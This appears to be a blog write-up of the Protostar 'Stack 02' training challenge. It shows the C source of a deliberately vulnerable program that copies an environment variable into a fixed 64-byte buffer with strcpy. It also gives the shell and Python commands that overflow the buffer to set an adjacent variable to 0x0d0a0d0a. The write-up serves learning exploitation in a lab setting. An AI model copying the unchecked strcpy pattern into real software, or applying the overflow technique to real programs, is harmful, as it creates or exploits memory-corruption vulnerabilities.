Protostar - Stack 02

May 05, 2018

Let’s take a look at the code of this challenge.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];
  char *variable;

  variable = getenv("GREENIE");

  if(variable == NULL) {
      errx(1, "please set the GREENIE environment variable\n");
  }

  modified = 0;

  strcpy(buffer, variable);

  if(modified == 0x0d0a0d0a) {
      printf("you have correctly modified the variable\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }

}

As we can see, there’s the buffer, modified variable and variable that is loaded from the environment variable GREENIE and copied into the buffer. In addition we have different if statement to satisfy - if(modified == 0x0d0a0d0a).

$ ./stack2
stack2: please set the GREENIE environment variable

But let’s remember the previous challenges and keep in mind that 66 bytes will overwrite 2 bytes from the modified variable. We can now simply export the GREENIE environment variable and assign to it 66 A letters.

What will happen?

$ export GREENIE=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
$ ./stack2
Try again, you got 0x00004141

As you can see that’s the same kind of vulnerability as in the previous challenges. Now we can finish it with last commands.

$ GREENIE=`python -c 'print "A"*64+"\x0a\x0d\x0a\x0d"'`
$ export GREENIE
$ ./stack2
you have correctly modified the variable

Contact

If you have any suggestions regarding this post or just want to chat together check out these ways to reach out to me.